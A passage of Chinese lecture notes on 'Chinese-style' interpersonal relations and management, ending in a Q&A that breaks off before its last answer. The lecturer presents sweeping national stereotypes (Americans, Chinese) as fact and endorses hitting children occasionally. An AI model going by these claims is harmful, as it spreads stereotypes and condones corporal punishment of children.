15、中国人的一生都是靠关系,家庭关系、师生关系、长官部属关系等等。你跟人家比什么?有什么好比的。他爸爸是谁?你爸爸又是谁?你爸爸不如他爸爸,所以你就不如他。你说,“我可以争气。”这个没有错,谁都可以争气。问题是,辛苦太多了。所以从各方面来讲,人是不平等的。那是不是让他继续不平等下去?不是。是不是要改成平等?也不是。我们走了一条非常奇怪的路,我们的人际关系叫做合理的不公平。所以什么叫做伦理?伦理就是合理的不公平。大家都公平就是没有伦理,彻底的不公平谁都接受不了,所以就成了合理的不公平。这样,大家就知道,为什么中国人要让来让去?如果公平有什么好让的,中国人一定要让。西方一个职位出缺了,他一定是最会争取的人拿走。中国不是。中国一个职位空缺了,让来让去,让给谁?让给最合理的人。所以每次别人都觉得不公平,怎么会是他呢?因为他才合理,他不一定合法。合理并不一定合法,西方人就是合法一定合理。西方人一切有制度。你这里做多久,你就升那里,然后到这里,按部就班,谁都不可以不按照规定来。如果中国人也按照这种思路做,则会天下大乱。其原因是西方人脑筋很呆板。中国人老是会想到走捷径,一旦通过捷径达到目标之后,就会教训部署要规规矩矩。中国人告诉大家按照规矩来,其言外之意是,他已经占到了便宜。他没有占到便宜以前,他是不择手段的;等到他占了便宜之后,他就开始照规定啊,不要乱来,这个叫做逆来顺守。这是西方人无法想象的东西。

16、文化是生存的花样,各有不同,没有好坏之分。一种文化的形成,是自然孕育成功的,不是哪些人去运作,就可以把一个文化搞出来的。文化不是说改变就可以改变的,因为文化已经内化到我们的心里头。

第四讲 
1、人际关系它跟盖房子一样,是一层一层往上盖的,不要一下子就一步登天。人际关系的根基是务实,做人一定要规规矩矩,做事一定要实实在在。

2、任何人,一进入社会,只有四个字:做人做事。不是做人,就是做事,而且几乎两者都是同时在做。

3、进入社会,要提醒自己:变是比较容易的,不变是比较容易的。要先学不变然后才学变,你才不会把自己搞得乱掉。有一句老话是:没在规矩无以成方圆。一定要从规矩开始,才能变化。

4、人生的第一生命是健康,第二生命是信用。一个人没有信用,到最后的结局是很可怕的。因为你讲什么话,人家都不相信你就惨了。你看很多人说怎么样怎么样,对方好像无动于衷;我告诉你是真的啊,对方也是无动于衷;我保证是正确的,对方还是不理会。这不是很惨吗?信用从哪里来?信用从你自己不断的坚持而得来的。

5、中国人常常用唱反调来查证说话者对于所说事实的真实程度和坚持程度。所以,说话者一定要经得起考验。

6、不要人去亦云,不要道听途说,就搞得天下大乱。

7、中国人是很聪明的。你告诉他一件事情,他就怀疑你为什么告诉我;你不告诉他,他也会怀疑你为什么不告诉我;你告诉他很快,他就怀疑“你这么早就告诉我干吗呢?”;你告诉他很迟,他就怀疑“你这什么先告诉别人,不告诉我呢?”这是很厉害的。

8、他每次看到你都慌张,你就会怀疑,“看到我有什么好慌张的?”,可见你有很多事情骗我;他每次看到你都很镇定,“你看,每次看到我都这么镇定”,可见他也以骗我。这是非常有意思的事情。过与不及真不行。所以,在中国社会,你一定要经得起考验。几乎所有的人都在考验试探你。我们就是在这种环境中长大的。

9、一个人,改变个性是很困难的,但是可以改变习惯。比如我知道自己个性不好,脾气很烈,我不能骂人,骂人都使别人受不了。那怎么办呢?太简单了,当你要生气的时候,你就回办公室,你就让自己冷静一下。你还是忍不住,你就拿一张纸出来,准备写信骂那个你想骂的人。然后在那个信上,什么恶劣的话都可以写出来。写到最后,不要马上寄给他,压一压,过两个小时一看,笑话,这种小事情值得发那么大脾气吗?然后就把信撕掉就没事了。你可以想出各种方法来帮助自己不发脾气,而不是改个性。改个性也许是永远也改不掉的事情。改的结果可能是改了几百字还是这样子的,想办法转移。

遇到生气的时候,不要马上反应。立马有反应,往往会害死自己。当你受到什么刺激的时候,不要用嘴巴反应,用嘴巴反应,那种话都是不好听的。不好听怎么样?大家慢慢地就有疏离感,然后人家对你就保持距离,你就得不到人家的帮助。从现在开始,有任何刺激进来,第一招是把嘴巴闭起来,而不是张开,因为一张开,你就会讲难听的话。闭起来,那个刺激就会上升到脑部,然后就会引起你的冷静思考。先让自己冷静下来再反应。实在不行的话,就避开那个场面。如果没有办法走,那就拿张纸,在纸上骂。

10、人与人,千万要记住:只能用脸色来暗示,不能给人家脸色看。你可以用你的脸色来暗示自己的态度,我不喜欢。你的脸色透露一些资讯给化,他会很感谢;你摆脸色给他看,他不必要看你的脸色,你算什么,我还看你的脸色。脸色的变化只能拿来传达你很难用嘴巴说出来的意见。

11、领导安排事情下面怎么办?你的领导交待下来的事情,你可以做你愿意做,你就去做;你不愿意做或者你觉得不能做,你就躲开。

12、我们要把决定权交给对方。你无权决定对方,对方能不能决定你,看你愿不愿意接受他的决定。

13、凡是讲究伦理的人,他只有一个原则,就是我不可能把我所有意见直截了当说出来。那就叫做目无尊长。有话直说,有话实说就是没人伦理,因为目无尊长。

14、当你务实之后,你就要开始学应变。你不够务实,就不要讲什么应变。一个不务实的人去变,那就乱变;一个务实的人去变,就叫应变。这个乱变与应变是截然不同的。同样的变,变得别人很高兴,这是因为变得合理。原来的原则没有破坏掉,你去变,当然可以。有时候,变得大家都不高兴,这是因为谈到最后,连原则就变掉了。中国人很重视原则,因为原则是根本。原则不能变,方法可以变;基本态度不能变,但是应对的方式可以变。叫做有所变有所不变。先学有所不变,再学有所变,这样,比较踏实。搞不懂有所不变,就开始去追求有所变,天下大乱。我们目前都在讲求新求变,这是非常不合适的。变是指那些守得住原则的人,你才可以放心的让他去变。一个人连基本原则都守不住,你叫他变,大家都很倒霉。这样,我们才能够理解为什么我们教小孩不要乱变,从来没有教小孩去求新求变的。因为做父母的很清楚,他一乱变,我家庭就完了。不要乱变,他站在不要乱变的立场来变,他就会变得很合理。变的最基本原则是变到大家都接受,你就成功了;变到大家都怕,变到大家都讨厌,变到大家都不敢接受,你就完了。

15、现在的人与以前的人是不一样的人。时代不同,环境不同,人心不一样。以前的人,给他一个糖果,他马上就往嘴里塞,因为他很放心;现在谁敢啊?谁给你一个糖果,你敢随便就吃吗?答案是不敢。因为一吃就被迷掉了,然后全身的东西被人拿光了。如今送糖果是如何送的。(这段文字较多,省略)

16、产品的创新,有80%是不成功的,只有少数才能成功。创新风险性非常大。但是,不创新呢?不创新死路一条。这里充满了矛盾。不创新,准备死死;一创新,也会死。所以一定要小心翼翼地去应变,小心翼翼地去创新。

17、在中国,我们跟每一个人的关系都不一样。西方人是一视同仁,因为大家都是上帝的兄弟姐妹,所以我跟你、跟上帝是相等的。中国人不是,你看中国人看到熟人他会笑,看到陌生人他马上板起脸孔。外国人不是,外国人看到谁都笑,他笑不是真心的,而是礼貌。所以中国的男人看到美国的小姐对他笑,他以为这个人很中意我。其实她只是对任何人都笑,而不是对特定的一个人笑。我们永远是亲疏有别的民族,中国人接电话是最能反映这一点的。所以说熟人好办事。西方人办事,会看谁有专业谁去办;中国人办事,会看谁有关系谁去办。

18、不要讲废话,讲废话的最后结果就是废掉自己。平时要养成习惯,否则到时候一定吃大亏。平常很务实,不说废话,不乱说话,简单明了,抓住要点,然后你应变起来的时候,你才知道这时候要讲什么话,那时候要讲什么话。对不对?现在很多年轻人都吃这个亏,他很认真,很负责,工作做得很好,但是始终跟上级的关系就是不好。很简单,他的上级打电话给他,“你现在有没有空?”他怎么回答,他回答,“你是谁?”他就很气,“我是谁?我还没问你是谁?”他说,“那你究竟是谁?”你看,这种人笨到这个地步,那就没什么关系了,搞了半天还是谁是谁。你想天下还有谁讲这种话,只有你顶头上司才讲这种话,你还再问你是谁。还有更惨的。太太打电话来,“晚上要不要回来吃饭?”你还问他,“你是谁啊?”她问你你又是谁啊?那么你就完了,统统完了。你回家还有晚饭吃我就不相信。这是自己跟自己找麻烦,关系就是这样被破坏掉的。

19、你的领导打电话给你,问你,“你现在有空吗?”你怎么回答,你说“有。”对你非常不利,他马上想到,你整天吃饱饭没事做,我每次打电话你都说有空有空,那你在做什么,就把你裁掉了。下次打电话问你有没有空,你说没空,他就知道了,这个人官僚十足,连我问他他都敢讲没有空,那别人还得了;对我都敢这样,对别人还得了。那一定是架子十足,你看多倒霉。中国社会凡是把话讲得很清楚的都很倒霉,西方不会,西方就是希望你把话讲清楚。对这个问题的最佳答案是:你的领导打电话给你,问你,“你现在有空吗?”你不要回答有空没空,而是回答,“我马上来!”我马上来就好了,有没有空是我家的事,我告诉你干什么。我马上来就够了。

你的上司打电话叫你去,你会不会空着脑袋去?中国人是不会空着脑袋去见上司的。中国人一般会想,“他干嘛找我?”,“什么事情?”,然后一看就知道,就是他打的小报告,不然怎么会找我呢?其实他一点事情也没有。中国人很怀疑,脑筋才会发达。你一定要想东想西,准备好了去你上司那边。你的上司对你印象对非常好。你脑袋空空进去就说什么事。他就跟你讲,“没事”。你说,“没事干嘛找我?”他说,“那你要回去就回去吧。”你说,“那就再见。”你还有什么希望啊?那就是呆瓜,就是白痴。像这些都是不会应变的人。一个人一定要实实在在,但是下面那句话很重要。一个人只知道实实在在,也没什么前途。记住:做人一定要实在,站在实在实在的立场来不实在,一开始就不实在,你就完了。很多事情只是差那么一点点,那就不得了。你给人家一个实在的印象,你偶尔讲那些不实在的话,人家会觉得你一定是有原因的,他会谅解,你不会存心骗我。如果一开始就不实在,你让人家感觉这个人不实在,那你所讲的话都是骗他的,对你是很吃亏的。我们要给人家一个很实在的印象,然后你去变,大家都会觉得“你不是乱变的人。你一定有原因的。”你如果一开始就给人家一个不实在的观念,你一变,人家就觉得你乱变。这个差太远了。

应变刚开始十之七八是不对的,变不是那么容易的事情。变是高度困难的,你看你不变他没事,一变就挨骂,因为你能够变到拿捏到那个度,很让对方满意,那是高难度的。人很喜欢变,但是对变的要求很高。你变得合理,他非常高兴;你变得不合理,他很难接受。那怎么办?不可不变,不可乱变,讲起来容易,怎么做?中国人很厉害,用调整来代替变,这个是最高明的。所以你看两个中国人经常讲这样的话,其中一个先发难,“你这个人怎么讲话没有信用呢?”他不承认,“我怎么没有信用?我最有信用。我哪里没有信用?我说这样就是这样,从来没有改变过。”中国人不接受人家说他没有信用。这个人就问了,“你没有变,那你在干什么呢?”他说,“我在干什么?我只是稍微调整一下。我哪里有变?”中国人就是利用不断的调整,整个都变掉了。你一变,对方就不高兴;你不变,大家都不高兴;你就用稍微调整一下来试试对方的反应。对方如果反应好,就再调整一下;反应不好再回来。这就是为什么中国人老是摇摆不定。我们经常脚踏两只船,给人家一种骑墙派的感觉,就是我们在调整。由调整来代替变,就是由逐渐的变到突变。由量变到质变,这个我们最拿手。我逐渐的变,慢慢变你就会适应,一下子变,你就很难适应。所以当一个领导,一旦上任,他一定讲,人事求安定,统统照旧,然后半年之内换光光。

20、一心求变那是搞革命。记住:企业不是搞革命的地方。我们不是要年轻人来搞革命的,企业是不断要有生力军,这个生力军不是要搞革命的。能够把新的点子,新的意见融入到原来的体制里面,就了不起了。生力军一进来就看人家,被人家看成是你要夺权,你要争利,要搞革命,你一定死定了。

21、一个人,先学实实在在规规矩矩,然后开始应变,从应变当中去磨练自己,磨到有一天,一出手就命中(这是人际关系的最高端)。不轻易出手,一出手一定命中。很多老练的人不轻易讲话,可是只要他讲一句话,他就有很大的效果;他不轻易出手,一出手对方一定跑不掉。那是高难度。我们不要要求自己那样高。我们现在第一个要求自己,你能不能给人家一个很实在的感觉?能不能。假如不能的话,赶快从这里去修正。如果你已经给人家一个可以信任的感觉,你才有资格去变,要变的时候一定要注意,站在对方可以接受的程度来变,而不是变到对方不能接受,不能接受他就跟你翻脸。

22、人与人之间靠的是一个字而已,不是权而是势,所以我们说中国人很势利?为什么很势利?因为那个势很厉害,形势绝对比人强,他在势在哪里,你不得不服他;他的权在哪里,你还可以夺他的权,所以中国人他是靠势,而不是靠权。

23、人际关系其实是六个字,前面两个字叫做布局。把那个局要布出来,中国人拉关系就是开始要布局,布了局以后就去造势,那个势一出来没有人挡得住。谁挡得住?形势所及,没有人能够抵挡,但是最后一定要摆平,你摆不平后遗症很严重。布局很重要,布局要布到大家没有办法反对,你才布得下去。你很明显去布,大家就开始怀疑开始反对。会然后是造势,把那个势造得很清楚以后,最后去摆平他。

24、建立关系很难,破坏关系是一下子的事情。所以要小心地照顾各种关系。是不是要用这个关系。不一定。有句话很重要,你永远也不知道什么时候需要这种关系。有关系不用没事,要用的时候找不到关系,就紧张,急死自己。所以为什么叫广结善缘。

 

第五讲

 

1、中国人做所有事情,都只有一个方法。什么方法?就是有原则的应变。中国人做任何事情,都是先把原则定下来,然后开始去应变。我们不可能没有原则,我们不可能完全按照原则一成不变的去表现,大概都做不到,因为我们非常喜欢随机应变。

 

2、到底人际关系有哪些原则呢?

 

第一个就是一切从自己做起,不怕吃亏,不要占小便宜,多让点别人。因为我们要了解:我们中国人最怕的就是吃亏上当,而我们最喜欢的就是占小便宜。我们一切一切,都很喜欢占小便宜,我们都生怕吃亏,这个对我们是很不利的事情。你看排队好了。哪个不知道排队好?哪个不知道要排队?他都知道。你问他,“排队好不好?”他一定告诉你,“当然好。”你问他,“那你排不排队呢?”他说,“一定排。我哪里有不排呢。”可是最后他一定加上一句话,这句话是非常严重的,“只要大家排我就排。”那表示,只要有人排我就不排,所以大家都知道排队好,大家都有排队的愿望,但是最后都乱七八糟,根源就在这里。所以我是劝告各位,真正要记住:吃亏就是占便宜。这句话听起来好像很矛盾,实在上你往长远看,他真的是真理。大家都喜欢耍小聪明,大家都喜欢占小便宜,社会永远没有好的秩序,永远没有。如果社会每个人都说,我吃亏一点有什么关系,你让贪就让你贪一点,我就是不贪小便宜,我就是该规矩的时候我就规矩,该排队我就一定排队,管别人排不排队,我们整个的社会就会改变过来。一个经得起吃亏的人,你是比较有福气的人;一个生怕吃亏的人,就表示你没什么福气;你要占便宜就占吧,你不怕人家占便宜,你就有很大的福气。你老爱占人家便宜,你要小心了,你不是一个福气很好的人,你看谁最喜欢占人家便宜,就是乞丐,乞丐看到人都要占便宜,那乞丐有什么福气呢?从这个角度可以理解,为什么施比受更有福气。

 

第二个就是我们最好把人跟人当作一面镜子。人跟人是什么关系,就是一面反射镜,你很容易从别人看到自己。为什么人家看到你,他都很客气?就是因为你值得他客气。为什么别人看到你,他那种表情就是很讨厌的样子?那你就要检讨自己了。

 

3、一个人,多做慈善的事情,多让一点别人,多照顾一点别人,你才显得你了不起,

 

4、只要错误的根源没找到,就永远不会改,永远改不了。

 

5、按门铃的案例,值得反思。原则:不要一直按,按两声,之后,退后一步。吵架的学问,很有意思。

 

6、凡是侵略性强的人,英雄性高的人,自我很强的人,在中国社会一定是吃亏的。在中国0社会,会抢的小孩不会占便宜,美国社会会抢的小孩一定占便宜。因为我们的妈妈跟西方的妈妈不一样,西方的妈妈鼓励竞争,你会抢你就应该抢的多,这是你得到的一个好的效果。中国人则非常同情弱者,西方人是同情有道理的人,我们不同情有道理的人,我们只同情弱者。只要你是弱者,大家都同情你。

 

7、中国人讲的随时是恰到好处,是适当的时候,即the proper time,而不是随时,any time。

 

8、我们是把个人和团体把它合在一起。西方人是讲究个人,我个人的表现,我个人的魅力,我个人的一切一切,由我自己承担。日本人是讲团队的,日本人没有个人的表现,他一切一切的关系都是团队对团队的关系;中国人是透过团队来完成完成自己,我们是把自我跟团队合在一起。没有团队做你的后盾,你有多大的能耐,有很好的团队,没有人做代表,你也显示不出来。所以,看起来,中国人是讲个人英雄,但实际上,他很讲究他背后那个支撑他的团队,所以一个人,如果没有靠山,没有背景,你最好少表现,要不然你到时候会撑不住。凡是敢出来稍微亮亮相,讲一些稍微大声的话,他的背景都相当的硬。

 

9、在变化上面,中国人更是变化多端。

 

第一个,中国人是虚虚实实的。什么叫虚虚实实?你看到大官要把他看小一点,你看到小官要把他看大一点,你就平衡了。你看到大官就觉得他很不不起,那你就怕得要命,连话就讲不出来,他就看不起你了,你怎么这么畏畏缩缩的?今后看到大官,你要自我建设,你有什么了不起,你也是两只眼睛一个鼻子,我虽然不如你,我也有两只眼睛一个鼻子,你自然会壮起一点胆子,你不要跟他平起平坐,但是最起码,你要有这个胆量,敢跟他应付。看小官你要把他看大一点。看不起这些小官的结果是我们自己吃亏。看大官你把他看小一点,你就不会胆怯;看小官你要把他看大一点,你就不会害怕。

 

第二个,中国人是真真假假的。什么叫真真假假?在真实他都有些假,在假里他都有些真,让人家捉摸不定。这是因为,我们对任何人都要有所防备,因为将来最容易害你的,就是自己人。因为中国人自古以来,不要让别人完全了解你,你也不要试图去完全了解另外的一个人。你跟领导在一起,如果你表现得他要做什么你都知道,他非常不喜欢你。因为他觉得,在你面前,他完全是透明的。有些事情你明明知道,要假装不知道。你完全不甩一个人,他很气;你完什么都知道,他更气。所以为什么要真真假假,假假真真?

 

10、中国人也是重视隐私的。中国人是通过讲别人(东家长李家短,张三怎么啦,李四又怎么啦)讲自己。

 

11、中国人是复仇心最强,复仇期最长的民族。你忘记了,他永远也记得住。所以,不到万不得已,不要翻脸。

 

12、完全没有脾气不好,常常发脾气也不好。适当就好。

 

13、我们都不是纯粹服侍别人的。人家对你越客气,你越要讲理。人家对你客气,往往不是无条件地客气。

 

我对你好,你就应该对我客气;我对你好,你对我不讲理,我可能不会翻脸那么快,因为你可能在想别的事情,你没有注意到,我要点你一下,希望能够把你点醒;如果点了多次,依然点不醒,怎么办呢?那就翻脸。

 

 

第六讲

 

1、西方人重视科学,所以他们一切要求真。我们中国人,讲究艺术,喜欢圆满,所以我们求善。真跟善不完全对应,也不完全冲突,它们是可以相融的。只不过,我们有时候为了善,我们会有点失真。

 

2、人生最重要的是什么?人生最重要的就是两个字:生活。人活着就是为了生活,不然你为什么活着。所以,你不要觉得,生活好浪费时间,不要这么想。我们整个生活的过程,才构成一个完整的人生。如果一天到晚都工作工作工作,那这个人还有什么价值呢?我们在工作、休闲、学习、锻炼还有各种活动当中取得平衡,所以人生最重要的就是生活。

 

那生活最重要的是什么?是人情。如果没有人情,你的生活很枯燥很乏味,就是我们常讲的没有人情味。人如果没有人情味,那跟动物没有什么差别。

 

人情最重要的是合理。什么叫圆满?圆满就是合理地表现出你的人情味。人与人在一起,讲究的是互动,互动难免会走冲突,就好像牙齿和舌头天天在,偶尔会咬得到,因此,也不用担心害怕。

 

3、我们是一个不道歉的民族。中国人你得罪了他,道歉也没有用。如果道歉,他嘴巴说没关系没关系,实际上他是耿耿于怀的。所以,我们要格外小心,要求你一开始就不要去得罪人,而不是得罪以后再来道歉。万一得罪了以后怎么办呢?其实是不用道歉的。你要用实际的行动来作一些补救,这个比较重要。中国人是用实际的行为,实际的动作来表示你的歉意。因此,我们一切都比较艺术化,不像西方是直来直往。

 

4、中国人比较讲究含蓄的美(很多话都讲得差不多就可以了,再讲下去就没意思了),又讲究亲疏有别。对越疏远的人,我们是越客气,我们讲话都有所保留;对于比较亲密的人,我们反面不讲究礼貌,比较容易把心里的话说出来。我们要小心,当别人把心里话告诉你的时候,就是开始把你当作比较亲近的人,这个时候,你自己要小心地拿捏。你要怎么去回应他?我的建议是:人与人之间还是要保持相当的距离,哪怕是夫妻。因为,当一个人被人家从头到尾看透了以后,他是很不自在的,他很不自在。所以,即便是夫妻,偶尔也要有一点分开。所谓分开就是在同个屋子里面,他在不同的房间,你让他去干他的事情,你少干扰他,也是必要的。从早上到晚上紧迫盯人,24小时追踪,最后一定是不愉快的。

 

我们是在团体当中有个人,看到个人就想到团体。我们一直在做一件事情,中国人要合起来想,你就比较圆满;你分开来想,你就糟糕。你看我们的财产是大家的,可是每个人都有一些自己可以动用的钱,每个人都有自己的自由裁量权。主管不要完全控制住部属的一分一秒,没有必要。你让他有些自主,让他有一些弹性,这样的关系比较好。你看,两个人很亲密很亲密,最后的关系就是翻脸。保持合理的距离,彼此都比较自在,这样才会比较安全,而且会持久。过分亲密不是好现象,过分疏离就越来越见外。过分疏远就有话不敢讲,有事情不敢谈,最后就无法沟通了。什么叫夫妻?就是你们两个人晚上门关起来才是夫妻。门一开就不是夫妻。门一开,你就是人家的父母;你门一开,你就是人家的儿子或者媳妇。

 

5、你从这边走过来,你的领导从对面走过来,你要怎么办?你开始就一直看着他,那是不对的,那就是你怕他他怕你。你看到他,你看旁边,他也看旁边,然后走过去没有看到,那也不对,这叫没有礼貌。你和你的领导相向走近,先把目光移过去,再赶快移回来,很自然的移来移去,可是移太快了,就叫做闪烁不定心里有鬼,你看难就难在这里。你随时体现,慢慢调整,就会调整成比较艺术的境界。比较艺术的大型商店的服务人员。

 

6、一个中国人,情绪好的时候很好商量;情绪不好的时候,不好商量。

 

7、建立关系不能一厢情愿,因为那是双方互动的事情。所以不能说,我有道理,我就可以要求人,没有那回事情,对方一百个不愿意,你再有道理也没有用。因此,情摆在前面。四个字,叫做,由情入理,最后还是要找到理的。因为合理事情是可以圆满的。

 

8、(以商店服务人员为案例。)一个人老跟着你,你有什么感想?当你需要的时候找不到人,你又有什么感想?老跟着你,你会烦;你要的时候找不到人,你会很气。其实,对于服务人员,真正能够吸引客户进来的是你美妙的操作动作。人与人之间的关系不是单面可以决定的。

 

9、人际关系,是差一点点就会造成后遗症。
 
 

第七讲 现场问答(上)

 

1、【问】董事长和总经理应该用多少时间搞人际关系,时间分配,多少时间研究战略问题和企业内的管理?

 

【答】我先问各位,一家公司到底是董事长大还是总经理大?是谁比较大?我是觉得中国人的事情,永远只有一个答案,很难讲。有的公司总经理大,有的公司董事长大,看谁做,中国人永远看谁做。美国的公司是董事长大,叫owner,所有公司的人是最大的,不是CEO。老实讲,这个CEO不听owner的话,他随时可能被干掉,那个人叫董事会主席。董事会主席一开会,就可能把CEO换掉。中国人不一定,在中国,这两个人是扯来扯去,看谁的形势比较好,你就拿他没办法。就算公司是你创建的,你也有一天会拿总经理没辙,因为他把人统统布好之后,他就不听你的话了,你控制不了他,了不起你把公司解散,你解散我就接收,我随时准备接收。所以说,董事长和总经理的关系是很微妙的,有配合得很好的,也有水火不相容的。我也看到过水火不相容的,经理有事情去问董事长,董事长说,“这个我不能决定,你去问总经理。”经理去问总经理,“笑话。当然要问董事长,问我有什么用?”因为凡是董事长说“Yes”的,总经理一定说“No”,有这样的合伙。他们两个是因为志同道合而创立公司,创立之后才发觉原来是背道而驰的。原来是好朋友,因为合作开设公司以后,翻脸成仇。

 

在中国,比较理想的情况应该是:总经理几乎是对内的,制定战略,管理企业;董事长是对外的,搞好各种人际关系,这样的分工会很好。很少有董事长是管战略的,而总经理是管人际关系的,因为,对于一个拥有者来说,关系永远是最重要的,策略可以随时改变,关系一定要掌握在自己手中。你把所有的关系都让给总经理,有一天,总经理一翻脸,他把所有的关系都拿走,你就惨了。如果两个人关系不好,那势必各自发展人际关系,迟早要一分高低。

 

2、【问】中国现在的民营企业是以制度为主,还是关系为主?

 

【答】我提醒台商,到大陆去发展企业,第一个是遵守法律。两岸相比,其实,大陆比较重视法律,台湾那边比较重视关系。这是不太一样的。在大陆,你出事,大家都说,有事找我没问题。一旦出了事,没人会理你的。法还是摆在前面,一旦违法,没人能够帮得上你。中国人是最会定制定的人。中国式管理第一步就是制度化。因此,公司一定要有制度,但制度化不是好的管理。制度化,我敢用绝对,不是好的管理。制度化会把好人绑得很僵化,动弹不得,有力使不出来,浪费人力资源;但是那些坏人呢?他天天逍遥法外,他不受约束,更造成那种不好的氛围。所以,我的结论是,中国人一定要做到有制度与没制度一个样,你说没有制度我其实我制度,你说我有制度我没有制度。要合起来想,不要分开来看。会说话的人,就是说到好像没有说一样,他又没有把柄被人家抓住。

 

道理本来就是变动的,你不变就会走偏路,马上就一偏就偏进去了。所以,我们老觉得,中国人说话不算数,刚刚讲这样,又讲那样,没有。要习惯这样,因为一切都在动,你怎么能不动呢?你看,老板经常说,就这样做,没问题,就这样做。但没过两分钟,他又说,不能这样做的,谁叫你这样做的。然后到下面的时候,你们根本乱七八糟,这样做才对。他一天变来变去。职位越高的人,他讲话越不算数,因为他看的都是变化的东西。职位低的人,看的都是定的东西,当然没有变。我们讲人际关系,底下是不变的,越往上越变,越往上越变。中国人的制度是管底下的,不是管上面的。中国有句很难听的话,不许百姓点灯,只许州官点火。这句话得好好想想,这句话不是没有道理,只是我们解释错了。职位越高的人,要给他越多的弹性,才不会把他绑死;职位越低的人,越不可能给他弹性,因为他的条件不够,他的判断力不行。

 

3、【问】老板的好朋友在公司任三把手,但由于工作不认真,造成工作上的失误不断,老板很气愤,大吵后三把手告假回家,请问老板下一步该怎么办?

 

【答】这种事情是经常会发生的。领导为什么要无为?因为只有这样,领导才有时间未雨绸缪,在事情还没有发生以前,就得想办法。干部多半是事情发生以后,才想办法;老板一定要预先去测试,我可能发生哪些问题,我怎么样在它没有发生以前,我就把它堵住,我会把它防止,让他不发生是最好。当一个人,开始有不同表现的时候,你就应该注意,不能等到接二连三的发生,你才去注意。职位越高的人越要记住:有任何风吹草动,你都不能放过。一个很认真的人,突然间不认真了,这就是一个警讯。这就得赶快去查什么原因,再想办法,比较有时间。

 

对于这个问题,只有两条路:一条,就是把他找回来,好好谈谈,然后看他能不能重新再振作起来;另一条就叫做壮士断腕,就是割掉不要了。

 

4、【问】我在一个外企,老板是老外,底下的员工是中国人,我应该用中式的思维还是西式的思维?

 

【答】很好的问题。因为我遇到过很多这样的案例。在外资企业,你不要忘记,大部分员工还是我们自己的同胞,你如果过分的按照老外的想法去做,他们心里头就把你当成“汉奸”;但是如果你不迁就老外,他就觉得你不能配合。因此,你跟老外沟通的时候,你要站在他的立场,说你要解决这个问题,用美国的方法是这样,但是,中国人另外一套方法,我现在说给你听,给你做参考,你有责任要帮助你的老外老板来慢慢了解我们的想法。

 

5、【问】何为不义之财?

 

【答】儒家也是要我们支赚取利润,不要以为说儒家不讲利。一句话,儒家讲究利义并重。没有利,你生存不了,你活不了。利有两种,一种是合理利润,一个是暴利;一种是邪利,一种是近利。你年利有近利有远利。我慢慢的赚,还是可以逐渐赚很多的,一口气把它赚进来的,其实都不长久。所以,凡是公司员工待遇太好,福利太好,你就知道他赚的是暴利,统统是暑利。什么房地产,化妆品等等行业。但凡是有什么变动,那些换取暴利的,第一个被淘汰掉。

 

6、【问】如何理解翻脸无情与十分忍耐的关系?

 

【答】十分忍耐是告诉我们,我们一般人,都是没有什么耐心的,都是缺乏耐心的。都希望立竿见影,总喜欢一投资马上马上有回收,总希望有学习马上有效果。这是不可能的事情。每件事情都要有课程,都要有时间,都是逐渐积累起来的。因此,一个人,先培养先忍耐忍耐的修养,然后当你翻脸无情的时候,你才不会失控,才不会太快去翻脸。一个人,没有忍耐的时候,随时在翻脸,经常翻脸的人,翻脸是没有用的;偶尔翻脸,翻脸是有用的。一个老板,动不动就发脾气,他的干部根本就不理会他。他认为这是你的习惯,他不会重视。一个常常骂人的人,骂人是没有效果的;一个很少骂人,偶尔骂人,他是很有效果的;天天看到小孩就打的人,那就是虐待小孩,从不打小孩的人,那就是你对你的小孩很有爱心。对于小孩,不能乱打,不能无理地打,但如果小孩实在不像话,也不能不打,但只能偶尔打打。站在不打不打的立场来打,而不是统统不打了。

 

打小孩,结论很简单,不要问应不应该打,不要讨论要不要打。对我们中国人来讲,打不打不是问题,怎么打才是问题。你专门去研究怎么打,你就成功了。对干部也是这样。我不轻易翻脸,但是并不表示我不翻脸,你不自爱我才翻脸,你才有一个警惕力嘛。这个叫恩威要并济,一个人只有恩没有威,那所有干部都骑到你头上来了,那还得了,那也是你自己自作自受;一个人,只有威没有恩,那就是刻薄寡恩,做人不能刻薄,但不能溺爱放纵。

 

7、【问】一个跨国公司是否除了要学习中国式管理外,还要学习印度式管理、阿富汗式管理、南非式管理。。。。。。?

 

【答】跨国公司如果各搞各的,各有各的企业文化,那就乱掉了,那大家就貌合神离,那没有资格叫跨国公司。跨国公司一定有他的主流文化。往往看老板是谁,老板是owner,是出钱的。如果这家公司的老板是美国人,他多半会拿美国的文化作主流,不管你是什么人,只要你是高阶层主管,就要写MEMO。我说明过美国式管理的特色,第一就是讲话不算话,没有见诸文字,就是讲的不正当。第二就是美国人专门抢人家的功劳。因为美国人他是作秀的心态开会。第三个,他一切照权利义务来讲。该向你报告,他就向你报告;不该向你报告,你问他,他也不会回答。他完全没有人性味。所有的美国人都是一句话,就是借债度日,所以他们才会卡。

 

8、【问】赖昌星是一个搭人际关系的高手吗?

 

【答】每件事情,都有两种不同的看法,阴阳文化厉害,就是说很多事情都有两种不同的看法。世事是难料的,事情一切都在变化。同样的人际关系,你用得好,它就是很好;用得不好,它就是不好。一件事情有利必有弊,有好就有坏。你用得好,这个人就是很懂得人际关系;一出事,你就知道他的人际关系是太差。

 

9、【问】一家个人独资企业,聘用的常务副总与老板已合作多年,但副总和其他部门经理关系密切,老板有危机感,该怎么办?

 

【答】可以想像当年刘备把诸葛亮请下来以后,刚开始关公不买他的账,张飞不买他的账,因为他们是一家人,你诸葛亮算老几?这个时候刘备以身作责,诸葛亮发布命令的时候,他来领军令,就是告诉关、张,“我们既然把人家请来,你就要听他的。”可是后来,关、张与诸葛亮处得很好。那么,这个时候,刘备就比较害怕了,你们搞起来就把我干掉了。所以,他在白帝城通过托孤的手段来安稳诸葛亮。

 

所以,一个人要么不要有疑心,如果起怀疑你就去试探。你可以给那个人讲说,我年纪也大了,你来接我的位子。你可以这样讲啊。他很兴奋,他问你什么时候啊?你就知道这个家伙根本就不怀好意。随时可以试的。不要老是在这怀疑,从多方面去试探,试到你不能放心就得采取相应的措施。

 

10、【问】曾老师,您有自己的企业吗,是否很成功?您认为您同家人及朋友关系很和谐吗?

 

